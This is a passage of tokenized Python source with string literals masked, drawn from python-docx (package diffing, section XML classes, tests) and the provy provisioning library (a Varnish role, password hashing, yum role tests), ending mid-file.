<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import re <EOL> from difflib import unified_diff <EOL> from lxml import etree <EOL> def diff ( text_1 , text_2 , filename_1 , filename_2 ) : <EOL> """<STR_LIT>""" <EOL> lines_1 = text_1 . split ( '<STR_LIT:\n>' ) <EOL> lines_2 = text_2 . split ( '<STR_LIT:\n>' ) <EOL> diff_lines = unified_diff ( lines_1 , lines_2 , filename_1 , filename_2 ) <EOL> trimmed_lines = [ ] <EOL> for line in diff_lines : <EOL> if line . endswith ( '<STR_LIT>' ) : <EOL> line = '<STR_LIT>' % line . rstrip ( ) <EOL> trimmed_lines . append ( line ) <EOL> return '<STR_LIT:\n>' . join ( trimmed_lines ) <EOL> def prettify_nsdecls ( xml ) : <EOL> """<STR_LIT>""" <EOL> def parse_attrs ( rootline ) : <EOL> """<STR_LIT>""" <EOL> attr_re = re . compile ( r'<STR_LIT>' ) <EOL> substrs = [ substr . strip ( ) for substr in attr_re . split ( rootline ) <EOL> if substr ] <EOL> head = substrs [ <NUM_LIT:0> ] <EOL> attrs , tail = ( ( substrs [ <NUM_LIT:1> : - <NUM_LIT:1> ] , substrs [ - <NUM_LIT:1> ] ) if len ( substrs ) > <NUM_LIT:1> <EOL> else ( [ ] , '<STR_LIT>' ) ) <EOL> return ( head , attrs , tail ) <EOL> def sequence_attrs ( attributes ) : <EOL> """<STR_LIT>""" <EOL> def_nsdecls , nsdecls , attrs = [ ] , [ ] , [ ] <EOL> for attr in attributes : <EOL> if attr . startswith ( '<STR_LIT>' ) : <EOL> def_nsdecls . append ( attr ) <EOL> elif attr . startswith ( '<STR_LIT>' ) : <EOL> nsdecls . append ( attr ) <EOL> else : <EOL> attrs . append ( attr ) <EOL> return sorted ( def_nsdecls ) + sorted ( nsdecls ) + sorted ( attrs ) <EOL> def pretty_rootline ( head , attrs , tail ) : <EOL> """<STR_LIT>""" <EOL> indent = <NUM_LIT:4> * '<STR_LIT:U+0020>' <EOL> newrootline = head <EOL> for attr in attrs : <EOL> newrootline += '<STR_LIT>' % ( indent , attr ) <EOL> newrootline += '<STR_LIT>' % ( indent , tail ) if tail else '<STR_LIT>' <EOL> return newrootline <EOL> lines = xml . 
splitlines ( ) <EOL> rootline = lines [ <NUM_LIT:1> ] <EOL> head , attributes , tail = parse_attrs ( rootline ) <EOL> attributes = sequence_attrs ( attributes ) <EOL> lines [ <NUM_LIT:1> ] = pretty_rootline ( head , attributes , tail ) <EOL> return '<STR_LIT:\n>' . join ( lines ) <EOL> class DiffPresenter ( object ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def named_item_diff ( package_1 , package_2 , uri_tail ) : <EOL> """<STR_LIT>""" <EOL> pkg_item_1 = package_1 . find_item_by_uri_tail ( uri_tail ) <EOL> pkg_item_2 = package_2 . find_item_by_uri_tail ( uri_tail ) <EOL> return DiffPresenter . _pkg_item_diff ( pkg_item_1 , pkg_item_2 ) <EOL> @ staticmethod <EOL> def rels_diffs ( package_1 , package_2 ) : <EOL> """<STR_LIT>""" <EOL> package_1_rels_items = package_1 . rels_items <EOL> return DiffPresenter . _pkg_item_diffs ( package_1_rels_items , package_2 ) <EOL> @ staticmethod <EOL> def xml_part_diffs ( package_1 , package_2 ) : <EOL> """<STR_LIT>""" <EOL> package_1_xml_parts = package_1 . xml_parts <EOL> return DiffPresenter . _pkg_item_diffs ( package_1_xml_parts , package_2 ) <EOL> @ staticmethod <EOL> def _pkg_item_diff ( pkg_item_1 , pkg_item_2 ) : <EOL> """<STR_LIT>""" <EOL> item_presenter_1 = ItemPresenter ( pkg_item_1 ) <EOL> item_presenter_2 = ItemPresenter ( pkg_item_2 ) <EOL> text_1 = item_presenter_1 . text <EOL> text_2 = item_presenter_2 . text <EOL> filename_1 = item_presenter_1 . filename <EOL> filename_2 = item_presenter_2 . filename <EOL> return diff ( text_1 , text_2 , filename_1 , filename_2 ) <EOL> @ staticmethod <EOL> def _pkg_item_diffs ( pkg_items , package_2 ) : <EOL> """<STR_LIT>""" <EOL> diffs = [ ] <EOL> for pkg_item in pkg_items : <EOL> uri = pkg_item . uri <EOL> pkg_item_2 = package_2 . find_item_by_uri_tail ( uri ) <EOL> diff = DiffPresenter . _pkg_item_diff ( pkg_item , pkg_item_2 ) <EOL> if diff : <EOL> diffs . 
append ( diff ) <EOL> return diffs <EOL> class ItemPresenter ( object ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , pkg_item ) : <EOL> """<STR_LIT>""" <EOL> if pkg_item . is_content_types : <EOL> presenter_class = ContentTypesPresenter <EOL> elif pkg_item . is_rels_item : <EOL> presenter_class = RelsItemPresenter <EOL> elif pkg_item . is_xml_part : <EOL> presenter_class = XmlPartPresenter <EOL> else : <EOL> presenter_class = ItemPresenter <EOL> return super ( ItemPresenter , cls ) . __new__ ( presenter_class ) <EOL> def __init__ ( self , pkg_item ) : <EOL> super ( ItemPresenter , self ) . __init__ ( ) <EOL> self . _pkg_item = pkg_item <EOL> @ property <EOL> def filename ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _pkg_item . path . replace ( '<STR_LIT:\\>' , '<STR_LIT:/>' ) <EOL> @ property <EOL> def text ( self ) : <EOL> """<STR_LIT>""" <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise NotImplementedError ( msg ) <EOL> @ property <EOL> def xml ( self ) : <EOL> """<STR_LIT>""" <EOL> xml_bytes = etree . tostring ( <EOL> self . _pkg_item . element , encoding = '<STR_LIT>' , pretty_print = True , <EOL> standalone = True ) . strip ( ) <EOL> xml_text = xml_bytes . decode ( '<STR_LIT:utf-8>' ) <EOL> return xml_text <EOL> class ContentTypesPresenter ( ItemPresenter ) : <EOL> def __init__ ( self , pkg_item ) : <EOL> super ( ContentTypesPresenter , self ) . __init__ ( pkg_item ) <EOL> @ property <EOL> def text ( self ) : <EOL> """<STR_LIT>""" <EOL> lines = self . xml . split ( '<STR_LIT:\n>' ) <EOL> defaults = sorted ( [ l for l in lines if l . startswith ( '<STR_LIT>' ) ] ) <EOL> overrides = sorted ( [ l for l in lines if l . startswith ( '<STR_LIT>' ) ] ) <EOL> out_lines = lines [ : <NUM_LIT:2> ] + defaults + overrides + lines [ - <NUM_LIT:1> : ] <EOL> out = '<STR_LIT:\n>' . join ( out_lines ) <EOL> return out <EOL> class RelsItemPresenter ( ItemPresenter ) : <EOL> def __init__ ( self , pkg_item ) : <EOL> super ( RelsItemPresenter , self ) . 
__init__ ( pkg_item ) <EOL> @ property <EOL> def text ( self ) : <EOL> """<STR_LIT>""" <EOL> def anon ( rel ) : <EOL> return re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , rel ) <EOL> lines = self . xml . split ( '<STR_LIT:\n>' ) <EOL> relationships = [ l for l in lines if l . startswith ( '<STR_LIT>' ) ] <EOL> anon_rels = sorted ( [ anon ( r ) for r in relationships ] ) <EOL> out_lines = lines [ : <NUM_LIT:2> ] + anon_rels + lines [ - <NUM_LIT:1> : ] <EOL> out = '<STR_LIT:\n>' . join ( out_lines ) <EOL> return out <EOL> class XmlPartPresenter ( ItemPresenter ) : <EOL> def __init__ ( self , pkg_item ) : <EOL> super ( XmlPartPresenter , self ) . __init__ ( pkg_item ) <EOL> @ property <EOL> def text ( self ) : <EOL> """<STR_LIT>""" <EOL> return prettify_nsdecls ( self . xml ) </s>
<s> """<STR_LIT>""" <EOL> class InvalidImageStreamError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class UnexpectedEndOfFileError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class UnrecognizedImageError ( Exception ) : <EOL> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , print_function <EOL> from copy import deepcopy <EOL> from . . enum . section import WD_ORIENTATION , WD_SECTION_START <EOL> from . simpletypes import ST_SignedTwipsMeasure , ST_TwipsMeasure <EOL> from . xmlchemy import BaseOxmlElement , OptionalAttribute , ZeroOrOne <EOL> class CT_PageMar ( BaseOxmlElement ) : <EOL> """<STR_LIT>""" <EOL> top = OptionalAttribute ( '<STR_LIT>' , ST_SignedTwipsMeasure ) <EOL> right = OptionalAttribute ( '<STR_LIT>' , ST_TwipsMeasure ) <EOL> bottom = OptionalAttribute ( '<STR_LIT>' , ST_SignedTwipsMeasure ) <EOL> left = OptionalAttribute ( '<STR_LIT>' , ST_TwipsMeasure ) <EOL> header = OptionalAttribute ( '<STR_LIT>' , ST_TwipsMeasure ) <EOL> footer = OptionalAttribute ( '<STR_LIT>' , ST_TwipsMeasure ) <EOL> gutter = OptionalAttribute ( '<STR_LIT>' , ST_TwipsMeasure ) <EOL> class CT_PageSz ( BaseOxmlElement ) : <EOL> """<STR_LIT>""" <EOL> w = OptionalAttribute ( '<STR_LIT>' , ST_TwipsMeasure ) <EOL> h = OptionalAttribute ( '<STR_LIT>' , ST_TwipsMeasure ) <EOL> orient = OptionalAttribute ( <EOL> '<STR_LIT>' , WD_ORIENTATION , default = WD_ORIENTATION . PORTRAIT <EOL> ) <EOL> class CT_SectPr ( BaseOxmlElement ) : <EOL> """<STR_LIT>""" <EOL> __child_sequence__ = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ) <EOL> type = ZeroOrOne ( '<STR_LIT>' , successors = ( <EOL> __child_sequence__ [ __child_sequence__ . index ( '<STR_LIT>' ) + <NUM_LIT:1> : ] <EOL> ) ) <EOL> pgSz = ZeroOrOne ( '<STR_LIT>' , successors = ( <EOL> __child_sequence__ [ __child_sequence__ . 
index ( '<STR_LIT>' ) + <NUM_LIT:1> : ] <EOL> ) ) <EOL> pgMar = ZeroOrOne ( '<STR_LIT>' , successors = ( <EOL> __child_sequence__ [ __child_sequence__ . index ( '<STR_LIT>' ) + <NUM_LIT:1> : ] <EOL> ) ) <EOL> @ property <EOL> def bottom_margin ( self ) : <EOL> """<STR_LIT>""" <EOL> pgMar = self . pgMar <EOL> if pgMar is None : <EOL> return None <EOL> return pgMar . bottom <EOL> @ bottom_margin . setter <EOL> def bottom_margin ( self , value ) : <EOL> pgMar = self . get_or_add_pgMar ( ) <EOL> pgMar . bottom = value <EOL> def clone ( self ) : <EOL> """<STR_LIT>""" <EOL> clone_sectPr = deepcopy ( self ) <EOL> clone_sectPr . attrib . clear ( ) <EOL> return clone_sectPr <EOL> @ property <EOL> def footer ( self ) : <EOL> """<STR_LIT>""" <EOL> pgMar = self . pgMar <EOL> if pgMar is None : <EOL> return None <EOL> return pgMar . footer <EOL> @ footer . setter <EOL> def footer ( self , value ) : <EOL> pgMar = self . get_or_add_pgMar ( ) <EOL> pgMar . footer = value <EOL> @ property <EOL> def gutter ( self ) : <EOL> """<STR_LIT>""" <EOL> pgMar = self . pgMar <EOL> if pgMar is None : <EOL> return None <EOL> return pgMar . gutter <EOL> @ gutter . setter <EOL> def gutter ( self , value ) : <EOL> pgMar = self . get_or_add_pgMar ( ) <EOL> pgMar . gutter = value <EOL> @ property <EOL> def header ( self ) : <EOL> """<STR_LIT>""" <EOL> pgMar = self . pgMar <EOL> if pgMar is None : <EOL> return None <EOL> return pgMar . header <EOL> @ header . setter <EOL> def header ( self , value ) : <EOL> pgMar = self . get_or_add_pgMar ( ) <EOL> pgMar . header = value <EOL> @ property <EOL> def left_margin ( self ) : <EOL> """<STR_LIT>""" <EOL> pgMar = self . pgMar <EOL> if pgMar is None : <EOL> return None <EOL> return pgMar . left <EOL> @ left_margin . setter <EOL> def left_margin ( self , value ) : <EOL> pgMar = self . get_or_add_pgMar ( ) <EOL> pgMar . left = value <EOL> @ property <EOL> def right_margin ( self ) : <EOL> """<STR_LIT>""" <EOL> pgMar = self . 
pgMar <EOL> if pgMar is None : <EOL> return None <EOL> return pgMar . right <EOL> @ right_margin . setter <EOL> def right_margin ( self , value ) : <EOL> pgMar = self . get_or_add_pgMar ( ) <EOL> pgMar . right = value <EOL> @ property <EOL> def orientation ( self ) : <EOL> """<STR_LIT>""" <EOL> pgSz = self . pgSz <EOL> if pgSz is None : <EOL> return WD_ORIENTATION . PORTRAIT <EOL> return pgSz . orient <EOL> @ orientation . setter <EOL> def orientation ( self , value ) : <EOL> pgSz = self . get_or_add_pgSz ( ) <EOL> pgSz . orient = value <EOL> @ property <EOL> def page_height ( self ) : <EOL> """<STR_LIT>""" <EOL> pgSz = self . pgSz <EOL> if pgSz is None : <EOL> return None <EOL> return pgSz . h <EOL> @ page_height . setter <EOL> def page_height ( self , value ) : <EOL> pgSz = self . get_or_add_pgSz ( ) <EOL> pgSz . h = value <EOL> @ property <EOL> def page_width ( self ) : <EOL> """<STR_LIT>""" <EOL> pgSz = self . pgSz <EOL> if pgSz is None : <EOL> return None <EOL> return pgSz . w <EOL> @ page_width . setter <EOL> def page_width ( self , value ) : <EOL> pgSz = self . get_or_add_pgSz ( ) <EOL> pgSz . w = value <EOL> @ property <EOL> def start_type ( self ) : <EOL> """<STR_LIT>""" <EOL> type = self . type <EOL> if type is None or type . val is None : <EOL> return WD_SECTION_START . NEW_PAGE <EOL> return type . val <EOL> @ start_type . setter <EOL> def start_type ( self , value ) : <EOL> if value is None or value is WD_SECTION_START . NEW_PAGE : <EOL> self . _remove_type ( ) <EOL> return <EOL> type = self . get_or_add_type ( ) <EOL> type . val = value <EOL> @ property <EOL> def top_margin ( self ) : <EOL> """<STR_LIT>""" <EOL> pgMar = self . pgMar <EOL> if pgMar is None : <EOL> return None <EOL> return pgMar . top <EOL> @ top_margin . setter <EOL> def top_margin ( self , value ) : <EOL> pgMar = self . get_or_add_pgMar ( ) <EOL> pgMar . 
top = value <EOL> class CT_SectType ( BaseOxmlElement ) : <EOL> """<STR_LIT>""" <EOL> val = OptionalAttribute ( '<STR_LIT>' , WD_SECTION_START ) </s>
<s> """<STR_LIT>""" <EOL> from behave import given , then , when <EOL> import docx <EOL> from docx import Document <EOL> from helpers import test_docx <EOL> @ given ( '<STR_LIT>' ) <EOL> def given_I_have_python_docx_installed ( context ) : <EOL> pass <EOL> @ when ( '<STR_LIT>' ) <EOL> def when_I_call_docx_Document_with_no_arguments ( context ) : <EOL> context . document = Document ( ) <EOL> @ when ( '<STR_LIT>' ) <EOL> def when_I_call_docx_Document_with_the_path_of_a_docx_file ( context ) : <EOL> context . document = Document ( test_docx ( '<STR_LIT>' ) ) <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_document_is_a_Document_object ( context ) : <EOL> document = context . document <EOL> assert isinstance ( document , docx . document . Document ) <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_last_p_contains_specified_text ( context ) : <EOL> document = context . document <EOL> text = context . paragraph_text <EOL> p = document . paragraphs [ - <NUM_LIT:1> ] <EOL> assert p . text == text <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_the_last_paragraph_has_the_style_I_specified ( context ) : <EOL> document , expected_style = context . document , context . style <EOL> paragraph = document . paragraphs [ - <NUM_LIT:1> ] <EOL> assert paragraph . style == expected_style <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_last_p_is_empty_paragraph_added ( context ) : <EOL> document = context . document <EOL> p = document . paragraphs [ - <NUM_LIT:1> ] <EOL> assert p . text == '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> from docx . opc . constants import RELATIONSHIP_TARGET_MODE as RTM <EOL> from docx . opc . oxml import ( <EOL> CT_Default , CT_Override , CT_Relationship , CT_Relationships , CT_Types <EOL> ) <EOL> from docx . oxml . xmlchemy import serialize_for_reading <EOL> from . unitdata . rels import ( <EOL> a_Default , an_Override , a_Relationship , a_Relationships , a_Types <EOL> ) <EOL> class DescribeCT_Default ( object ) : <EOL> def it_provides_read_access_to_xml_values ( self ) : <EOL> default = a_Default ( ) . element <EOL> assert default . extension == '<STR_LIT>' <EOL> assert default . content_type == '<STR_LIT>' <EOL> def it_can_construct_a_new_default_element ( self ) : <EOL> default = CT_Default . new ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> expected_xml = a_Default ( ) . xml <EOL> assert default . xml == expected_xml <EOL> class DescribeCT_Override ( object ) : <EOL> def it_provides_read_access_to_xml_values ( self ) : <EOL> override = an_Override ( ) . element <EOL> assert override . partname == '<STR_LIT>' <EOL> assert override . content_type == '<STR_LIT>' <EOL> def it_can_construct_a_new_override_element ( self ) : <EOL> override = CT_Override . new ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> expected_xml = an_Override ( ) . xml <EOL> assert override . xml == expected_xml <EOL> class DescribeCT_Relationship ( object ) : <EOL> def it_provides_read_access_to_xml_values ( self ) : <EOL> rel = a_Relationship ( ) . element <EOL> assert rel . rId == '<STR_LIT>' <EOL> assert rel . reltype == '<STR_LIT>' <EOL> assert rel . target_ref == '<STR_LIT>' <EOL> assert rel . target_mode == RTM . INTERNAL <EOL> def it_can_construct_from_attribute_values ( self ) : <EOL> cases = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , RTM . INTERNAL ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , RTM . 
EXTERNAL ) , <EOL> ) <EOL> for rId , reltype , target , target_mode in cases : <EOL> if target_mode is None : <EOL> rel = CT_Relationship . new ( rId , reltype , target ) <EOL> else : <EOL> rel = CT_Relationship . new ( rId , reltype , target , target_mode ) <EOL> builder = a_Relationship ( ) . with_target ( target ) <EOL> if target_mode == RTM . EXTERNAL : <EOL> builder = builder . with_target_mode ( RTM . EXTERNAL ) <EOL> expected_rel_xml = builder . xml <EOL> assert rel . xml == expected_rel_xml <EOL> class DescribeCT_Relationships ( object ) : <EOL> def it_can_construct_a_new_relationships_element ( self ) : <EOL> rels = CT_Relationships . new ( ) <EOL> expected_xml = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> assert serialize_for_reading ( rels ) == expected_xml <EOL> def it_can_build_rels_element_incrementally ( self ) : <EOL> rels = CT_Relationships . new ( ) <EOL> rels . add_rel ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> rels . add_rel ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , True ) <EOL> rels . add_rel ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> expected_rels_xml = a_Relationships ( ) . xml <EOL> assert serialize_for_reading ( rels ) == expected_rels_xml <EOL> def it_can_generate_rels_file_xml ( self ) : <EOL> expected_xml = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . encode ( '<STR_LIT:utf-8>' ) <EOL> ) <EOL> assert CT_Relationships . new ( ) . xml == expected_xml <EOL> class DescribeCT_Types ( object ) : <EOL> def it_provides_access_to_default_child_elements ( self ) : <EOL> types = a_Types ( ) . element <EOL> assert len ( types . defaults ) == <NUM_LIT:2> <EOL> for default in types . defaults : <EOL> assert isinstance ( default , CT_Default ) <EOL> def it_provides_access_to_override_child_elements ( self ) : <EOL> types = a_Types ( ) . element <EOL> assert len ( types . overrides ) == <NUM_LIT:3> <EOL> for override in types . 
overrides : <EOL> assert isinstance ( override , CT_Override ) <EOL> def it_should_have_empty_list_on_no_matching_elements ( self ) : <EOL> types = a_Types ( ) . empty ( ) . element <EOL> assert types . defaults == [ ] <EOL> assert types . overrides == [ ] <EOL> def it_can_construct_a_new_types_element ( self ) : <EOL> types = CT_Types . new ( ) <EOL> expected_xml = a_Types ( ) . empty ( ) . xml <EOL> assert types . xml == expected_xml <EOL> def it_can_build_types_element_incrementally ( self ) : <EOL> types = CT_Types . new ( ) <EOL> types . add_default ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> types . add_default ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> types . add_override ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> types . add_override ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> types . add_override ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> expected_types_xml = a_Types ( ) . xml <EOL> assert types . xml == expected_types_xml </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , print_function , unicode_literals <EOL> import pytest <EOL> from docx . opc . constants import CONTENT_TYPE as CT <EOL> from docx . opc . package import OpcPackage <EOL> from docx . oxml . styles import CT_Styles <EOL> from docx . parts . styles import StylesPart <EOL> from docx . styles . styles import Styles <EOL> from . . unitutil . mock import class_mock , instance_mock <EOL> class DescribeStylesPart ( object ) : <EOL> def it_provides_access_to_its_styles ( self , styles_fixture ) : <EOL> styles_part , Styles_ , styles_ = styles_fixture <EOL> styles = styles_part . styles <EOL> Styles_ . assert_called_once_with ( styles_part . element ) <EOL> assert styles is styles_ <EOL> def it_can_construct_a_default_styles_part_to_help ( self ) : <EOL> package = OpcPackage ( ) <EOL> styles_part = StylesPart . default ( package ) <EOL> assert isinstance ( styles_part , StylesPart ) <EOL> assert styles_part . partname == '<STR_LIT>' <EOL> assert styles_part . content_type == CT . WML_STYLES <EOL> assert styles_part . package is package <EOL> assert len ( styles_part . element ) == <NUM_LIT:6> <EOL> @ pytest . fixture <EOL> def styles_fixture ( self , Styles_ , styles_elm_ , styles_ ) : <EOL> styles_part = StylesPart ( None , None , styles_elm_ , None ) <EOL> return styles_part , Styles_ , styles_ <EOL> @ pytest . fixture <EOL> def Styles_ ( self , request , styles_ ) : <EOL> return class_mock ( <EOL> request , '<STR_LIT>' , return_value = styles_ <EOL> ) <EOL> @ pytest . fixture <EOL> def styles_ ( self , request ) : <EOL> return instance_mock ( request , Styles ) <EOL> @ pytest . fixture <EOL> def styles_elm_ ( self , request ) : <EOL> return instance_mock ( request , CT_Styles ) </s>
<s> class ConfigurationError ( RuntimeError ) : <EOL> '''<STR_LIT>''' </s>
<s> '''<STR_LIT>''' <EOL> from provy . core import Role <EOL> from provy . more . debian . package . aptitude import AptitudeRole <EOL> class VarnishRole ( Role ) : <EOL> '''<STR_LIT>''' <EOL> def provision ( self ) : <EOL> '''<STR_LIT>''' <EOL> with self . using ( AptitudeRole ) as aptitude : <EOL> aptitude . ensure_package_installed ( '<STR_LIT>' ) <EOL> def ensure_vcl ( self , template , varnish_vcl_path = '<STR_LIT>' , options = { } , owner = None ) : <EOL> '''<STR_LIT>''' <EOL> result = self . update_file ( template , varnish_vcl_path , options = options , sudo = True , owner = owner ) <EOL> if result : <EOL> self . log ( '<STR_LIT>' ) <EOL> self . ensure_restart ( ) <EOL> def ensure_conf ( self , template , varnish_conf_path = '<STR_LIT>' , options = { } , owner = None ) : <EOL> '''<STR_LIT>''' <EOL> result = self . update_file ( template , varnish_conf_path , options = options , sudo = True , owner = owner ) <EOL> if result : <EOL> self . log ( '<STR_LIT>' ) <EOL> self . ensure_restart ( ) <EOL> def cleanup ( self ) : <EOL> '''<STR_LIT>''' <EOL> super ( VarnishRole , self ) . cleanup ( ) <EOL> if '<STR_LIT>' in self . context and self . context [ '<STR_LIT>' ] : <EOL> self . restart ( ) <EOL> def ensure_restart ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . context [ '<STR_LIT>' ] = True <EOL> def restart ( self ) : <EOL> '''<STR_LIT>''' <EOL> command = '<STR_LIT>' <EOL> self . execute ( command , sudo = True ) </s>
<s> import crypt <EOL> from random import SystemRandom <EOL> def random_salt_function ( salt_len = <NUM_LIT:12> ) : <EOL> """<STR_LIT>""" <EOL> charset = "<STR_LIT>" <EOL> charset = charset + charset . upper ( ) + '<STR_LIT>' <EOL> chars = [ ] <EOL> rand = SystemRandom ( ) <EOL> for _ in range ( salt_len ) : <EOL> chars . append ( rand . choice ( charset ) ) <EOL> return "<STR_LIT>" . join ( chars ) <EOL> def hash_password_function ( password , salt = None , magic = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> magic = str ( magic ) <EOL> if salt is None : <EOL> salt = random_salt_function ( ) <EOL> salt = "<STR_LIT>" . format ( magic = magic , salt = salt ) <EOL> return crypt . crypt ( password , salt ) </s>
<s> from datetime import datetime , timedelta <EOL> import sys <EOL> from mock import patch , MagicMock <EOL> from nose . tools import istest <EOL> from provy . more . centos import YumRole , PackageNotFound <EOL> from provy . more . centos . package import yum <EOL> from tests . unit . tools . helpers import ProvyTestCase <EOL> class YumRoleTest ( ProvyTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( YumRoleTest , self ) . setUp ( ) <EOL> self . role = YumRole ( prov = None , context = { } ) <EOL> @ istest <EOL> def installs_necessary_packages_to_provision ( self ) : <EOL> with self . mock_role_methods ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . role . provision ( ) <EOL> self . role . ensure_up_to_date . assert_called_once_with ( ) <EOL> self . role . ensure_package_installed . assert_called_once_with ( '<STR_LIT>' ) <EOL> @ istest <EOL> def ensures_gpg_key_is_added ( self ) : <EOL> with self . execute_mock ( ) : <EOL> self . role . ensure_gpg_key ( '<STR_LIT>' ) <EOL> self . role . execute . assert_called_once_with ( '<STR_LIT>' , sudo = True , stdout = False ) <EOL> @ istest <EOL> def checks_that_repository_exists_in_yum_repos ( self ) : <EOL> with self . execute_mock ( ) as execute : <EOL> execute . return_value = '''<STR_LIT>''' <EOL> result = self . role . has_source ( '<STR_LIT>' ) <EOL> self . assertTrue ( result ) <EOL> execute . assert_called_once_with ( "<STR_LIT>" , sudo = True , stdout = False ) <EOL> @ istest <EOL> def checks_that_repository_doesnt_exist_in_apt_source ( self ) : <EOL> with self . execute_mock ( ) as execute : <EOL> execute . return_value = '<STR_LIT>' <EOL> result = self . role . has_source ( '<STR_LIT>' ) <EOL> self . assertFalse ( result ) <EOL> @ istest <EOL> def ensures_a_source_string_is_added_to_the_repos ( self ) : <EOL> source_line = '<STR_LIT>' <EOL> with self . execute_mock ( ) as execute , self . mock_role_method ( '<STR_LIT>' ) as has_source : <EOL> has_source . return_value = False <EOL> self . assertTrue ( self . 
role . ensure_yum_source ( source_line ) ) <EOL> self . assertTrue ( has_source . called ) <EOL> execute . assert_called_once_with ( '<STR_LIT>' . format ( source_line ) , sudo = True , stdout = False ) <EOL> @ istest <EOL> def doesnt_add_source_if_it_already_exists ( self ) : <EOL> source_line = '<STR_LIT>' <EOL> with self . execute_mock ( ) as execute , self . mock_role_method ( '<STR_LIT>' ) as has_source : <EOL> has_source . return_value = True <EOL> self . assertFalse ( self . role . ensure_yum_source ( source_line ) ) <EOL> self . assertFalse ( execute . called ) <EOL> @ istest <EOL> def gets_update_date_file_as_a_property ( self ) : <EOL> with self . mock_role_method ( '<STR_LIT>' ) : <EOL> self . role . remote_temp_dir . return_value = '<STR_LIT>' <EOL> self . assertEqual ( self . role . update_date_file , '<STR_LIT>' ) <EOL> @ istest <EOL> def stores_update_date ( self ) : <EOL> with self . mock_role_methods ( '<STR_LIT>' , '<STR_LIT>' ) , patch . object ( yum , '<STR_LIT>' ) as mock_datetime : <EOL> self . role . update_date_file = '<STR_LIT>' <EOL> when = datetime . strptime ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> mock_datetime . now . return_value = when <EOL> self . role . store_update_date ( ) <EOL> self . role . execute . assert_called_once_with ( '<STR_LIT>' , stdout = False ) <EOL> @ istest <EOL> def gets_last_update_date ( self ) : <EOL> with self . mock_role_methods ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . role . update_date_file = '<STR_LIT>' <EOL> self . role . remote_exists . return_value = True <EOL> self . role . read_remote_file . return_value = '<STR_LIT>' <EOL> result = self . role . get_last_update_date ( ) <EOL> self . assertEqual ( result , datetime . strptime ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . role . remote_exists . assert_called_once_with ( self . role . update_date_file ) <EOL> self . role . read_remote_file . assert_called_once_with ( self . role . 
update_date_file ) <EOL> @ istest <EOL> def gets_none_as_last_update_if_there_was_no_update_yet ( self ) : <EOL> with self . mock_role_methods ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . role . update_date_file = '<STR_LIT>' <EOL> self . role . remote_exists . return_value = False <EOL> result = self . role . get_last_update_date ( ) <EOL> self . assertIsNone ( result ) <EOL> self . assertFalse ( self . role . read_remote_file . called ) <EOL> @ istest <EOL> def updates_yum_when_passed_time_limit ( self ) : <EOL> with patch . object ( yum , '<STR_LIT>' ) as mock_datetime , self . mock_role_methods ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> now = datetime . strptime ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> then = now - timedelta ( minutes = <NUM_LIT> ) <EOL> mock_datetime . now . return_value = now <EOL> self . role . get_last_update_date . return_value = then <EOL> self . role . ensure_up_to_date ( ) <EOL> self . role . get_last_update_date . assert_called_once_with ( ) <EOL> self . role . force_update . assert_called_once_with ( ) <EOL> @ istest <EOL> def doesnt_update_if_not_passed_from_time_limit ( self ) : <EOL> with patch . object ( yum , '<STR_LIT>' ) as mock_datetime , self . mock_role_methods ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> now = datetime . strptime ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> then = now - timedelta ( minutes = <NUM_LIT> ) <EOL> mock_datetime . now . return_value = now <EOL> self . role . get_last_update_date . return_value = then <EOL> self . role . ensure_up_to_date ( ) <EOL> self . assertFalse ( self . role . force_update . called ) <EOL> @ istest <EOL> def forces_an_update ( self ) : <EOL> with self . mock_role_methods ( 